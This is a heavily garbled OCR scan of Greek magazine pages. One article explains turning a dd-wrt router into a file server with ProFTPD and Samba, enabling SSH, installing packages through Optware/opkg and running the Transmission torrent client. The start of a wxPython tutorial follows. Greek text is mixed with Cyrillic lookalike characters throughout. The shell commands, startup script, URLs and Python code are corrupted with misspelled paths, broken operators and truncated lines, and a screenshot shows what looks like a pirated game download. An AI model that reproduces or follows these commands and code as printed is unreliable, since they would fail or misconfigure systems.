ProFTPD ProFTPD 


User Password List: Enter one User 
ProFTPD © Enable © Disable Password per line. Password can be 
plain text or MDS crypt. 


Server Port [— a (Default: 21) 


Files Directory font [ж 


Allow Write © Enable © Disable (Default: Disable) 


User Password List giannoug deltahacker 


Anonymous Login (Read-only) ) Enable © Disable 


File Sharing 


© Enable © Disable 
Use Custom Configuration Э Enable (9 Disable 
Server String [gatekeeper | 


Workgroup WORKGROUP 


== 
т | [se | umask EA fash 


Br 


осо και ro USB Storage Support. Επιπλέον, evepyonoioùpe ro Automatic 
Drive Mount και ορίζουµε ως σηµείο προσάρτησης (mount point) το /mnt. 
Χαμηλότερα, στο πεδἰο Disk Info, εμφανίζονται πληροφορἱες για τις oU- 
σκευὲς αποθήκευσης USB nou συνδέουµε πάνω στον router. Oa єпістре- 
woupe ξανὰ oe αυτἠ την καρτέλα. Πα την ὥρα, μπορούμε ма συνδέσουµε 
στη συσκευὴἠ ¿va USB flash disk και va παρατηρήσουμε ті θα γίνει. 


Н καρτέλα ΝΑΣ, ὀπως προδἰδει και ro ὀνομα, περιέχει υπηρεσίες nou pE- 
τατρέπουν то router µας σε ¿va (anAó) network attached storage. Εδὠ 
μπορούμε va ενεργοποιἠήσουµε και ма ρυθµίσουµε τους δύο servers που 
нас ενδιαφέρουν, συγκεκριµένα τον ProFTPD yia το πρωτόκολλο FTP και 
τη SAMBA yia το SMB:. 


Αρχικἁ ενεργοποιούµε τον ProFTPd, апла πατώντας ro Enable. Oa χρει- 
аотєі va του υποδείξουµε noU βρίσκονται τα αρχεία µας. Εἰχαμε επιλέξει 
πριν λίγο o USB δίσκος να προσαρτάται στο /mnt, опотє αυτή τη θέση 
υποδεικνύουµε στον ProFTPd. Επειδἠ θέλουμε ὀχι μόνο να παϊρνουµε 
алла και ма ανεβάζουµε αρχεία µέσω FTP, ενεργοποιούµε και ro Allow 
Write. Τέλος, στο πεδίο User Password List ορἰζουµε τους χρήστες οι 
οποίοι επιθυμούμε va ¿xouv πρόσβαση. Θα χρειαστεί να δώσουμε éva 
χρήστη ауа γραμμὴ, ξεχωρίζοντας ro username апо ro password µε ¿va 
κενὀ. Παράδειγμα: 


giannoug lovesjustinbieber 
ѕибе secretlyloveswindows 


Αν тора δεν µας ενδιαφἐρουν or χρήστες και бєЛоциє о καθένας va unai- 
νει στον FTP server µόνο για να παἰρνει αρχεία, απλά ενεργοποιούμε то 
Anonymous Login (Read-only). Αυτὸ βέβαια προὐποθέτει ότι εµπιστευ- 


1. Me то SMB μπορούμε να στἐλνουµε και να παίρνουμε αρχεία και φακέλους κατευθείαν μέσα апо та 
Windows ἡ то OS X, χωρίς την εγκατάσταση κάποιου ἐξτρα προγράµµατος. 


To router µας 

εἶναι πανέτοιμο και 
μοιράζεται µέσω 
ΕΤΡ kai SMB όλα 
τα αρχεία апо то 
flash disk µας. 
Εντάξει, για την 
ώρα δεν κάνει каті 
TO συναρπαστικὀ. 
Πα την фра. 


Πολύ Linux θυμίζει 
εδώ γύρω. A, ναι, 
εἶναι που πρἀγµατι 
βρισκόµεστε στο 
Linux. Ποιος θα 

Το περίμενε απὀ 
TO роитєракі µας, 
єр 
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ΩΩ 


ὁμαστε ὁλους τους χρήστες ото топіко δίκτυο κι ότι о server µας δεν 
φαίνεται апо ro Internet. 


Ἠρθε тора η σειρἁ του SAMBA server. Ξεκινάμε επιλέγοντας ro Enable, 
δίνουμε ἑνα буора oro Server String kai πληκτρολογούµε то workgroup 
στο οποίο θέλουμε va συμμετέχει. Παρεμπιπτόντως, τα πιο συνηθισμένα 
ονόματα εἰναι WORKGROUP και MSHOME -- μιλάμε για τρελἠ πρωτοτυ- 
nia! Αν πάντως δεν εἶμαστε σίγουροι για το ὀνομα rou workgroup στο 
τοπικὀ µας δίκτυο, σε κάποιο Windows box μπορούμε ν΄ ανοἰξουµε ёма 
command prompt window και να δώσουμε 


net config workstation 


(προσέξτε τη γραµµή Workstation domain.) Ακολουθεί η ρύθμιση του 
SAMBA server και, πιο συγκεκριµένα, των φακέλων που θα μοιράζει. Στο 
прото πεδίο δίνουμε το δίσκο µας. Θα πρέπει να υπάρχει ша μόνο επιλο- 
уп, αφού έχουμε συνδεδεμένο μόνον ємам δίσκο πάνω τον οποίο και δια- 
A£youpe. Στο επόμενο πεδίο γράφουμε éva ὀνομα, για παράδειγµα Stuff, 
κι αποεπιλἐγουµε то Public. Στον пімака ορἰζουμε τους χρήστες. Δίνουμε 
va username και password κι επιλέγουμε τον φάκελο nou δημιουργἠ- 
caue πριν. Εἱμαστε πλέον ἑτοιμοι ki όλα εἶναι σωστά. Πατάμε στο Apply 
Settings yia va αποθηκευτούν κι ενεργοποιηθούν οι ρυθμίσεις. 


Μπορούμε тора να докірасоциє να συνδεθούμµε στον router, pe тоу aya- 
πημένο µας ҒТР client και τα στοιχεία που δώσαμε! Епіспс, ro ρουτεράκι 
θα Φαίνεται στο δίκτυο του σπιτιού ως ἑνας υπολογιστής που μοιράζει 
αρχεία και φακέλους -- χάρη στη SAMBA, φυσικὰ. 


The Linux side of things 


Καιρὸς va δούμε και την Linux πλευρὰ rou router µας. Ξεκινάμε ενερ- 
γοποιώντας τον SSH server, ὥστε να εἰμαστε σε θέση va συνδεόμαστε 
στη συσκευἠ και µέσω του ομώνυμου πρωτοκόλλου, αποκτώντας πλἠ- 
pn πρόσβαση στο κἐλυφος του λειτουργικού. Ппуаїмоциє στην καρτέλα 
Services και βρίσκουμε ro Secure Shell. Ενεργοποιούµε και πατάμε Apply 
Settings. Ανοίγουμε τον αγαπημένο µας SSH client? και συνδεόµαστε στο 


Р = - - — n] 
gf 192.168.1.1 - PuTTY [| RES 


s == а 


2. To PuTTY yia Windows µας καλύπτει απόλυτα! 


Μετατρέψτε τον router бас σε torrent downloader! 
| 


192.168.1.1 (п στη διεύθυνση rou router, τέλος πάντων). Συνδεόµαστε 
στον λογαριασμό του root κι ο κωδικὀς εἶναι αυτὸς που δώσαμε την npo- 
τη фора nou συνδεθἠκαµε στη συσκευή. 


To λειτουργικὀ θα µας καλωσορίἰσει. Δε θα то κρύψουμε, προς то паром 
δεν έχουμε και πολλά να κάνουμε εδώ. Μπορεί να πρὀκειται για ἑνα πλἠ- 
ρες σύστημα Linux, λείπουν ωστόσο αρκετά спуаутіка κομμάτια που θα 
το χαρακτήριζαν ως ἑνα πραγματικά ολοκληρωμένο περιβάλλον. Πώς, 
п.Х., εγκαθιστούμµε πακέτα, ὁπως поло ωραία κι ὀμορφα κάνουμε σε ἁλ- 
λες διανομὲς σαν ro Ubuntu, το openSuSE και τόσες άλλες; 


ЕЁ 192.168.1.1 - PuTTY = 


т 


М 


Εγκατάσταση και ρύθμιση Optware 


Πριν συνεχίσουμε και στην ουσία απαντήσουμε στο προηγούμενο ερώτη- 
μα, okónipo εἶναι να κάνουμε µια σύντομη, προκαταρκτικἠ παρουσίαση 
yia то λεγόμενο Optware. О ὀρος καθιερώθηκε anó ro Unslung Linux (www. 
nslu2-linux.org/wiki/Main/HomePage) κι арҳіка αφορούσε σε software yia 
TO Linksys NSLU2 (http://en.wikipedia.org/wiki/NSLU2). Ακριβώς то ἴδιο 
ὀνομα, Optware, ἐχει κι о σχετικὸς package manager, ο οποίος δεν ασχο- 
Літа µε λεπτομέρειες опис, EX, ας πούμε διανομὴ, αλλά εγκαθιστά 
εφαρμογὲς σε ¿va συγκεκριµένο μέρος» апо ὁπου ο χρήστης µπορεἰ να 
τις τρέχει. To Optware, ενώ ξεκίνησε апо το Unslung Linux σύντομα nė- 
расе και σε ἄλλες διανομές, фиска και σε αυτή rou dd-wrt! 


Υπάρχει όμως ropa va алло πρὀβλημα. Та πακέτα rou Optware εἶναι 
ἡδη µεταγλωττισμένα yia επεξεργαστὲς ARM, ενώ το μικρὸ µας router 
εἶναι апо εκεἰνα µε επεξεργαστἠ MIPS. Τι κάνουμε λοιπὸν σε µια τέτοια 
περίπτωση; Κάνουμε кат! ὀχι και τόσο αναμενόμενο, που όμως δουλεύει: 
Χρησιμοποιούμε rov αντίστοιχο package manager апо το αδελφὀ του dd- 
wrt πρότζεκτ, ονόματι OpenWrt. Και το κάνουμε упаті τα πακέτα --τουλά- 
Χιστον τα δηµοφιλή-- του OpenWrt, εἶναι µεταγλωττισμένα για περισσὀ- 
τερες апо μία αρχιτεκτονικὲἐς επεξεργαστών, μεταξύ aurov και για MIPS. 
Ας δούµε πὼς εργαζὀµαστε. 


Βήμα 1. Па αρχἠ χρειαζόμαστε ¿va фЛасакі USB ἡ ¿vav εξωτερικὀ σκλη- 
ро -- πάντα USB. Па την περίπτωση που εξετάζουμε θέλουμε κυρίως να 


3. Συνήθως στο /opt, εξ’ ου και το ὀνομα. 


Η εγκατάσταση του 
орка πήγε ρολόι. 
Μην δίνετε onpa- 
σία στα μηνύματα 

λάθους. Αγνοήστε 
τα επειδεικτικἁ και 
συνεχίστε τη ζωή 
σας σαν να µην τα 
εἰδατε ποτέ. Kara- 
λαβαίνουμε πόσο 
δύσκολο εἰναι αυτὀ 
για κάποιους, ὀμως 
ακούστε µας. 


Λίστα µε όλα та 
εγκατεστημένα 
πακέτα για την 
ομαλή λειτουργία 
του Transmission 
BitTorrent client, 
εντός TOU router 


μας! 
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Є ВЈ 
gf 192.168.1.1 - PuTTY arm) 


d 


κατεβάζουμε αρχεία, οπότε ἐχει περισσότερο νόημα η χρήση εξωτερικού 
σκληρού. Τον δίσκο ауто πρέπει ма rov διαμορφώσουμε κατὰ Ext3. Ap- 
γότερα, θα προσαρτηθεί апо το λειτουργικὀ του router κι εκεὶ θα єука- 
θίστανται та πακέτα rou Optware. Πέρα апо αυτά, θα αποθηκεύονται και 
τα αρχεία που θα κατεβάζουμε/ανεβάζουμε. Η διαµόρφωση του δίσκου 
ката Ext3 εἶναι δυνατὸν να γίνει µε το mkfs του Linux ἡ µε τη βοήθεια 
ενὸς εργαλείου σαν ro GParted Live (http://gparted.sourceforge.net/ 
livecd.php). 


Βήμα 2. Βάζουμε rov δίσκο πάνω στον router kai συνδεόμαστε στη OU- 
σκευὴ µέσω SSH. Φτιάχνουμε τους απαραίτητους φακέλους κι εγκαθι- 
στούμε та прота µας αρχεία. Εκτελούμε καθεμία апо τις παρακάτω εντο- 
λές. (О δίσκος εἶναι προσαρτημένος като апо то /mnt/sda parti κι όχι 
като апо το /mnt, ὁπως θα περίμενε κανεὶς.) 


cd /mnt/sda parti 


mkdir etc opt root 
chmod 755 etc opt root 
mkdir opt/lib 

chmod 755 opt/lib 
touch optware.enable 


cp -a /etc/* etc/ 
mount -o bind etc/ /etc 
mount -o bind opt/ /jffs 


wget http://downloads.openwrt.org/ \ backfire/10.03.1/ar71xx/ 
packages/libc 0.9.30.1-43.32 ar71xx.ipk 


wget http://downloads.openwrt.org/ ἈΝ backfire/10.03.1/ar71xx/ 
packages/opkg 576-2 ar71xx.ipk 


cat » /etc/opkg.conf «« EOF 

src/gz snapshots http://downloads.openwrt.onrg/ \ 
backfire/10.03.1/ar71xx/packages 

dest root /opt 

dest ram /tmp 

lists dir ext /tmp/var/opkg-lists 

EOF 


Μετατρέψτε τον router σας σε torrent downloader! 
Αα 


Р Eek 
| wf gatekeeper (build 19342) - х V — | = — 
e ο få |O 19216811/0іадпоѕіісѕаѕр D mz 
Administration ^ 
Management ^ KeepAlive | Commands МОЦ Factory Defaults | Firmware Upgrade Backup 
| Diagnostics | CERERI Е 


Command Shell Commands: 

You can run command lines via the web 
interface, Fill the text area with your 
command and dick Aun Commands to 
submit, 


Commands 


Startup 
£!/bin/sh 


if [ -£ /mnt/sda parz3/optware.enable 1; then 
mount -o bind /mnt/sda partS/etc /etc 
mount -o bind /mnv/sds parvS/root /tmp/root 
mount -o bind /mnt/sda partS/opt /opt |. 
else 
exit 
fi 


if [ -d /opt/usr ]; then 
export LD LIBRARY PATH-'/opt/1ib:/opt/usr/1ib:/lib:/usr/1ib' 
export PATH-'/opt/bin:/opv/usr/bin:/cpv/sbin:/opt/usr/sbin:/bin:/sbin:/usr/sbin:/usr/bin' 
else 
exit 
fi 


export TRANSMISSION WEB HOME-'/opt/usr/share/vransnission/web' 
vransmission-daemon -g /tmp/root/.config/transmission-daemon 


«T T Г 


mE | 


Βήμα 3. Еінастє σχεδὀν ἑτοιμοι. Πηγαΐνουμε ото web panel rou router 
μας. Θα πρέπει va εισαγάγουµε κάποιες εντολὲς του BASH, οι οποἰες θα 
εκτελούνται ката την εκκἰνηση της συσκευἠς. Επιλέγουµε Administration 
> Commands και ρίχνουμε στο κουτἰ το παρακάτω. 


it! /bin/sh 


if [ -f /mnt/sda part3/optware.enable ]; then 
mount -o bind /mnt/sda рагі1/еїс /etc 
mount -o bind /mnt/sda parti1/root /tmp/root 
mount -o bind /mnt/sda parti/opt /opt 


else 
exit 

fi 

if [ -d /opt/usr ]; then 
export \ 


LD LIBRARY PATH-'/opt/lib:/opt/usr/lib:/lib:/usr/lib' 
export X PATHz'/opt/bin:/opt/usr/bin:/opt/sbin:/opt/usr/sbin:/ 
bin:/sbin:/usr/sbin:/usr/bin 
else 
exit 
f 
Πατάμε Save Startup κι επανεκκινούμετη συσκευἠ, апо ro Administration 
> Setup > Reboot Router. Μόλις ξεκινήσει συνδεόμαστε και πάλι µέσω 
SSH. Па να δούμε ам ὁλα πήγαν καλά, τρέχουμε τον νέο διαχειριστή 
πακέτων: 
opkg update 


Σε περίπτωση λάθους κοιτάμε палі ὁλες τις £vTOÀÉG και σιγουρευόμαστε 
πως ο δίσκος µας ὀντως βρίσκεται στον φάκελο 548 parti. Αν δεν sipa- 


To BASH script 
που θα εκτελείται 
κατά την εκκίνηση 
TOU router. Av o 
εξωτερικός δίσκος 
ἡ το φλασάκι δεν 
βρεθεί, η εκκίνηση 
προχωρά ομαλά. 
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То αρχείο pu8- 
μίσεων του 
Transmission δεν 
εἶναι ιδιαίτερα 
πολύπλοκο και 
περιέχει ÓAEG τις 
κλασικὲς ρυθμίσεις 
ενὀς BitTorrent 
client. 
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GNU nano 2.2.6 File: /.config/transmission-daemon/settings.json 


A 


στε σίγουροι, μπορούμε va το δούμε апо το μενού USB, nou εἰδαμε πριν. 


Τέλος, εγκαθιστούµμε ορισμένα πακέτα, τα οποία περιέχουν τις βασικὲς 
βιβλιοθήκες που χρειάζονται οι εφαρμογές yia να τρέχουν: 

opkg install libc 

opkg install libgcc 

opkg install uclibcxx 
Πριν συνεχίσουμε κάντε ¿va σύντομο διάλειμμα, για να εγκαταστήσετε 


та nano και htop. Γενικά, ἐχετε υπόψη ὁτι η σύνταξη rou орко εἶναι na- 
ρόμοια µε τη σύνταξη rou apt-get, апо τις Debian-based διανομές Linux. 


Εγκατάσταση Transmission 


Όλα ωραία και кала, έχουμε μετατρέψει ¿vav μικρὸ και ταπεινὸ router σε 
£vav σχεδὸν πλήρη Linux server. pa να κάνουμε και κάτι πιο ενδιαφέἑ- 
pov. Oa εγκαταστἠσουµε rov BitTorrent client ονόματι Transmission μαζὶ 
µε TO web panel του! Ξεκινάμε πληκτρολογώντας ra ακόλουθα: 


opkg update 

opkg install transmission-daemon transmission-web 
τρέχουμε για λίγο то πρὀγραμμα, ioa για να προλάβει να δημιουργήσει ra 
апараїтпта αρχεία ρυθµίἰσως, κι αµέσως то σταματάμε: 


transmission-daemon 
killall transmission-daemon 


Θα χρειαστεί va πειράξουµε δύο σηµεἰα σε ὁλο то σχετικὀ config. Прота 
απ΄ όλα πρέπει να ορίσουμε το που θα αποθηκεύονται τα αρχεία. Μετά, 
θα χρειαστεἰ να επιτρέψουμε και την πρὀσβαση ото web panel του 
Transmission. Ανοίγουμε το αρχείο ρυθμίσεων: 


nano /tmp/root/.config/transmission-daemon/settings.json 
Οι αλλαγές nou θα χρειαστεἰ va κάνουμε φαίνονται παρακάτω. 


"download-dir": "/mnt/sda parti/Downloads", 
[2] 


Μετατρέψτε τον router σας σε torrent downloader! 
| 


ΕΠΗ σα 
BB Transmission Web Interfaz 
є ς fi |O 19216811.19091/transmission/we τα Ἐ 
ιο шш EN «7 
Open e 2 се р Pause All Еее. Filter Inspector 
1Transfers 4 379.0 KB/s Ф 0.0 KiB/s 
СПР Active Downloading Seeding Paused Finished а 
Sleeping.Dogs-SKIDROW 
Downloading from 1 cf 17 peers - DL: 379.0 ЮВ 0.0 KB, 
| 


"incomplete-dir": "/mnt/sda parti1/Downloads", 


[...] 
"Ppc-whitelist": "127.0.0.1,192.168.1.*", 
Αποθηκεύουμε τις αλλαγές ото settings.json κι εγκαταλείπουµε том 


editor. Δεν ξεχνάμε να δημιουργήσουμε том κατάλογο των torrent, опис 
τον δηλώσαμε στο αρχεἰο ρυθμίσεων rou Transmission: 


mkdir /mnt/sda parti/Downloads 


Τέλος, oro web panel rou router πηγαίνουμε oro Administration > 
Commands και npoo8£rouye τα παρακάτω, στο τέλος των EVTOÀOV που 
βάλαμε πριν: 
export TRANSMISSION WEB HOME- М '"/opt/usr/share/transmission/web' 
transmission-daemon -g /tmp/root/.config/transmission-daemon 


Ἕνα τελευταἰο restart rou router και εἰμαστε ἐτοιμοι! Πηγαίνοντας στο 
192.168.1.1:9091 нє τον αγαπημένο µας web browser, θα δούμε ro web 
panel rou Transmission. Ta υπόλοιπα τα αφήνουμε о’ єсас! 


ΟΙ πρώτες δοκιμές 
στέφθηκαν µε 
επιτυχία! To router 
μας πλέον λει- 
тоцруєї «και ως 
BitTorrent client! 


Η αλήθεια εἶναι 
ότι η συσκευή 
ζορίζεται κάπως 
παραπάνω µε TO 
Transmission, ra 
καταφέρνει! ша 
хара όμως! 


ЕР 192.168.1.1 - PuTTY 
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PID USER PRI NI УТЕТ RES SHR S CPUS MEM% TIME+ Command 
3992 root 20 0 18808 8076 1124 5 1.0 27.2 0:42.98 /opt/usr/bin/tra 
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Python και ΝΧΡΥΤΠΦΠ: 
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Θέλουμε να πιστεύουμε πως µε την προηγούμενη σειρἁ άρθρων µας 
πάνω στην Python και το PyGame, που ξεκίνησε anó το deltaHacker 005 
(τεύχος Φεβρουαρίου 2012, http://deltahacker.gr/?p-4215), σας αποδεὶ- 
ξαμε ὁτι ο προγραμματισμός δεν χρειάζεται να εἶναι βαρετὸς, καθὼς кі 
оті υπάρχει κάτι περισσότερο апо τα προγράμματα κειμένου και KOV- 
σόλας. Όχι Оті δεν то γνωρίζατε, δηλαδή, αλλά έτσι όπως διδάσκεται 
о προγραμματισμὸς στο σχολείο εἶναι πιθανὀ να σας δημιουργήθηκε η 
εντύπωση πως το περιβάλλον γραφικών εἶναι µόνο για τους ueber gurus 
της πληροφορικής! Па να µην παρεξηγούμαστε, πάντως, θα πούμε εδὠ 
ὁτι εμάς τουλάχιστον µας αρέσουν (πολύ) τα προγράµµατα κονσόλας. 
Σίγουρα ὁμως θα πρέπει να κάνουν κάτι πιο ενδιαφέρον απὀ τις βαρετὲς 
ρουτίνες rou АЕПП. 


Тоос να амаратієстеє για ποιο λὀγο δεν διδάσκεστε προγραμματισμὀ ура- 
φοντας προγράµµατα σε/για περιβάλλον γραφικὠν ἡ ακόµη και παιχνίδια, 
όπως κάναμε στο περιοδικὀ. Μπορούμε να σκεφτούμε μερικούς λόγους... 


ο Οπρογραµμματισμὸς σε περιβάλλον κειµένου δεν απαιτεἰ τη γνώση 
πολύπλοκων τεχνικὠν πρόσβασης στην οθὀνη και στις συσκευὲς 
εισόδου και επιτρέπει να επικεντρώνουµε στη δηµιουργία του αλ- 
γόριθµου. 

ο О προγραμματισμὸς σε περιβάλλον γραφικὠν βασἰζεται σε τεχνικὲς 
συμβάντων (όπως έχουμε δει στο PyGame) και εἶναι δύσκολος για 
κάποιον που δεν γνωρίζει ακόµα ra βασικἀ της πρώτης του γλὠσ- 
σας προγραμματισμού. 

ο Σε πολλές περιπτώσεις, о προγραμματισμὀς µια εφαρμογἠς γραφι- 
ком απαιτεἰ ἐννοιες και TEXVIKEG αντικειμενοστρεφούὺς προγραμμα- 
τισμού, ενώ τα κλασικά βιβλία στο σχολείο επικεντρὠνουν σε бі- 
αδικαστικὲς γλὠσσες προγραμματισμού (procedural programming 
languages, ὁπως εἶναι п Pascal). 

Και κάπου εδὠ ακούμε κάποιους апо єсас να φωνάζουν бт! έχουν γράψει 
προγράμματα σε Visual Basic (πιθανὸν στην παλιά ἑκδοση, την 6.0). Δεν 
θέλουμε να αρχίσουμε τις κακἰες yia τη VB (θα ro κάνουµε όμως av eni- 
μείνετε). Μπορούμε ωστόσο να σας πούμε ἑνα βασικὀ χαρακτηριστικὀ της 
VB: Κρύβει пара πολλὲς λεπτομέρειες της δημιουργίας µιας εφαρμογἠς 
γραφικών πἰσω апо va ἐτοιμο περιβάλλον ανάπτυξης, ro οποίο oucia- 
στικἁ γράφει (αόρατα) κὠδικα για εμάς. 


To πρὀβλημα µε την παραπάνω αντιμετώπιση εἶναι От! όποιος ἐχει γράψει 
εφαρμογἠ μόνο στη VB, στην πραγματικότητα δεν Epei τι χρειάζεται για 
να αναπτυχθεί ша εφαρμογἠ γραφικών. Έχει «μόνοξ ша ιδέα апо сурВа- 
ντα (events), αλλά δεν γνωρίζει πὼς ακριβώς καλούνται (λόγω αυτού του 
κώδικα, που γράφεται αὀρατα). 


О γράφων, θέλοντας στις παλιὲς καλὲς εποχὲς να μάθει τι πραγματικἁ 
σηµαίνει ανάπτυξη εφαρμογἠς γραφικών (για Windows, τότε) αγόρασε 
κάποια βιβλία. Με τρόμο τότε διαπίστωσε бт! το κλασικὀ, των πέντε Ypap- 
роу, πρόγραμμα Hello World στη C, ἦταν δύο ολόκληρες σελίδες στην 
περίφημη Visual C! Κι auró γιατὶ στην Visual С δεν υπάρχει крифос κὠδι- 
кас κι o προγραμματιστἠὴς πρέπει να γνωρίζει τι γίνεται στο παρασκήνιο. 


Δεν χρειάζεται ὁμως να παλεύουμε rov προγραμματισμὸ εφαρμογών ypa- 
PIKOV, µε γλὠσσες ὁπως п C. Паті, καθὼς φαντάζεστε, εἶναι поло βολικὀ 
va αντιμετωπίζουμε óÀa αυτά та καλούδια nou µας παρέχει το περιβάλλον 
γραφικών (παράθυρα, εικονίδια, πεδία κειµένου, λίστες, combo boxes кі 
όλα τα άλλα widgets, ὁπως λέγονται) ως αντικείμενα. Н C όμως δεν εἰναι 


Ηνάπτυξη εφαρμογών σε περιβάλλον γραφικών 
ML 


αντικειµενοστρεφἠς γλὠσσα και ἴσως εκπλαγεἰτε αν μάθετε бт! то АРІ 
των Windows έχει урафтєї о" аотйу kai *бєу* εἶναι αντικειμενοστρεφἑς! 


Τι κάνουμε λοιπὸν σε µια περίπτωση nou θέλουμε να αντιμετωπίσουμε 
τον προγραμματισμὀ σε περιβάλλον γραφικών ως αντικειµενοστρεφή, 
ακόµα και αν εσωτερικά δεν εἶναι; Πολύ апла, καταφεύγουµε σε ¿va GUI 
toolkit! Н ἴδια η Microsoft παρουσίασε τότε то МЕС (Microsoft Foundation 
Classes), ro onoio ἦταν ἑνα wrapper library: Έκανε τον προγραμματισμὀ 
εφαρμογών урафікфу σε Windows αντικειµενοστρεφἠ, προσθέτοντας 
va ενδιάμεσο layer το οποίο µετέφραζε τα αντικείμενα του МЕС στις 
κανονικές κλήσεις του АРІ των Windows. Έτσι, μπορούσε κάποιος να 
γράψει την εφαρµογἡ rou στη Visual С++. 


Βέβαια εδὠ δεν θα σας μιλήσουμε yia C, С++ ἡ Windows (ам και ra npo- 
γράμματα µας θα τρέχουν ша χαρά *kai* σε αυτὀ το λειτουργικὀ), αφού 
για ἄλλη µια фора το όπλο µας ва εἶναι η Python. 


Python kai προγραμματισμὸς γραφικών 


Ότι ¿kave п MS ue то МЕС γρήγορα ёү και σε ἄλλα λειτουργικἁ συστή- 
рата και γλὠσσες: О αντικειµενοστρεφἠς προγραμματισμὸς βολεύει ιδι- 
airepa, ὅταν γράφουμε εφαρμογές γραφικών. Εδὠ ӧрос̧ ἐχουμε єма ἄλλο 
θέμα: η Python εἶναι ша γλὠσσα διαπλατφορμική (cross-platform). Та 
προγράμματα που γράφουμε σε αυτἠν θα πρέπει να εκτελούνται παντού 
-- ἡ τουλάχιστον σε ὁποια πλατφόρμα п γλὠσσα εἶναι διαθέσιμη και φυσι- 
ка εγκατεστημένη. Αυτό δημιουργεἰ το παράδοξο να πρέπει διαφορετικά 
περιβάλλοντα γραφικών (τα οποία ενδεχομένως εσωτερικἁ λειτουργούν 
διαφορετικά) ма προγραμματἰζονται µε том ἰδιο τρόπο :5 


Και κάπου εδὠ ἐρχεται ма µας σώσει то wxPython. 


H βασικἠ ιδέα του wxPython 


To wxPython εἶναι ша διαπλατφορμικἠ βιβλιοθήκη εργαλείων (toolkit) για 
δημιουργία εφαρμογών γραφικών (GUI applications). Αυτό σημαίνει оті 
η βιβλιοθήκη αυτή ἐχει φτιαχτεἰ ὥστε να προσφέρει µια σταθερἠ бієпа- 
φἠ προγραμματισμού (programming interface) προς εμάς, τους χρήστες 
της, αλλά ταυτόχρονα μεταφράζει 
κατάλληλα rov κὠδικά µας, амало- 
γα µε то A&rroupyikÓ κάτω апо то 
οποίο εκτελείται. Με απλά λόγια, 
ауто σημαίνει τα ακόλουθα: 


[Hello World of wxPython! 


Elle Edit Tools Syntax Buffers Window Help 


Εντάξει, то ξέρου- 
µε ὁτι δεν εἶναι 
εντυπωσιακὀ, алла 
εἶναι TO прото 

σας πρόγραμμα 

σε wxPython. Av 
θέλαμε va εἰμαστε 
πιο σωστοί βέβαια 
θα δημιουργού- 
cape éva device 
context kai ба 
χρησιμοποιούσαμε 
την DrawText, yia 
va βόλουμε то κεί- 
μενο (ro StaticText 
widget εἶναι éva 
γρήγορο κι εὐκολο 
hack). Τώρα που 
εἶδατε ra Device 
Contexts сто πρό- 
ypauua Drawing, ΤΙ 
λέτε; Μπορείτε va 
το φτιάξετε; Δείτε 
KI εδώ: http:// 
wxpython.org/docs/ 
api/wx.DC-class. 
htmliDrawText 


látdjasi*elkenizoolmmbisus 


ο Αν γράψετε µια εφαρμογἠ 
σε Python kai wxPython, θα 
μπορείτε ма την τρέχετε σε 
Linux Windows, OS X και φυ- 
сіка BSD (nou 0a єурафа то 
άρθρο αλλιώς, µου A£TE;) 

ο Όταν εκτελέσετε την εφαρ- 
μογἠ σε καθένα απὀ αυτά та Pn ο μμ 
λειτουργικὰ συστήματα, η 
εμφάνιση της θα εἶναι φυσι- 
ολογικἠ. Στα Windows, п.х., 
το παράθυρο, τα εικονίδια 
κ.ο.κ. δεν θα διαφέρουν σε 
aic8non και λειτουργία anó 


[port wx 


class HelloWorld(wx.Frame): 
def init (self, *args, **kw): 


self .ShowMessage() 
def Showiesssge(self): 
self.Show(True) 
def maint): 
hello = wx.App() 


p 
HelloWorld(Hone, titles*Hello World") 
hello.MainLoop() 


"hellowx2.py" 18L, 387C 


super(HelloWorld,self). init (*args,**kw) 


caption = wx.StaticText(self, labele"Hello World of wxPython!") 
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τις ἄλλες κλασικὲς εφαρμογές Windows. То ióio φυσιολογικό θα 
Φαίνεται και στα υπόλοιπα λειτουργικά: Н εφαρµογἠ σε καθένα θα 
μοιάζει µε αντίστοιχη native. 


Αν πιστεύετε От! αυτὸ το τελευταίο δεν εἶναι onpavrikó, δοκιμάστε να 
τρέξετε ro IDLE (rov Python editor) σε διάφορα λειτουργικὰ και θα EK- 
πλαγεἰτε. Βλέπετε, το IDLE δεν εἶναι γραμμένο σε wxPython αλλά σε µια 
ἄλλη βιβλιοθήκη, то TKinter, η οποία δεν ακολουθεί τη Φιλοσοφία της 
πρὠτης. Ἔτσι, ora Windows το IDLE φαίνεται τελείως παράταιρο, καθὼς 
το παράθυρο και το μενού δείχνει σαν να ἐχει ἐρθει апо κάποια διανοµή 
Linux -- και μάλιστα της παλιάς εποχής! 


Το wxPython, αλλά апо μέσα 


Δεν χρειάζεται προφανώς να ξέρετε τα πάντα γύρω апо την εσωτερι- 
кӯ λειτουργία του wxPython, yia να γράψετε τα прота σας προγράμ- 
ната σε ауто. Εἶναι ὁμως χρήσιμο να ξέρετε бт! το wxPython εἰναι ἑνας 
wrapper για την βιβλιοθήκη wxWidgets. Το πρόβλημα εἶναι ὁτι η βιβλι- 


Πολύ ενδιαφέρου- οθήκη wxWidgets εἶναι γραμμένη σε С++ και εμεὶς θέλουμε Python. Н 

σες οἱ παρενέργει- wxPython αποτελεί µια ενδιάµεση διεπαφἠ: Με απλά λόγια, μεταφράζει 

ες: Перудиє éva κάθε εντολἠ στην αντίστοιχη που καταλαβαίνει η wxWidgets. 

παράθυρο πάνω 

апо την εφαρµογή e H wxPython αποτελεἰται апо πἐντε Васіка αρθρώματα ἡ modules, 

μας κι αυτή μοιάζει αν προτιμάτε: 

να τρελαίνεται! Δεν 

yu όμως ο ο Ta Controls, τα οποία περιέχουν τα πιο κοινά widgets που χρησι- 
Ιαραστε TO а ο | 5 A 

о m р μοποιούν οι εφαρμογές γραφικών. 

σωστή εξήγηση. e To Core, то οποίο περιέχει βασικὲς κλάσεις που χρησιμοποιούνται 

Αν θελετε να δείτε σε όλα τα ἄλλα αρθρώματα (ra οποἰα βέβαια τις επεκτείνουν Ka- 


каті ακόµα, npo- 
σθέστε τη γραμμή 
self. Bind(wx. 

EVT. MOVE, self. 
OnPaint) като anó 


таллдла για να δημιουργήσουν πιο εξειδικευμένα αντικείμενα). 


ο To GDI, που περιέχει τις κλάσεις σχεδίασης (Graphics Device 
Interface). Oa δεῖτε бт! περιἐχει επιφάνειες, πινέλα, μολύβια και 


την πρώτη Bind Χρώματα! 

και δείτε ті γίνεται . : : : . 
όταν μετακινείτε ο Ta Windows, τα οποία περιέχουν τις κλάσεις που δημιουργούν та 
το παράθυρο στην διάφορα εἰδη παραθύρων. 

οθὀνη! 


e To misc, το οποίο περιέχει! õi- 
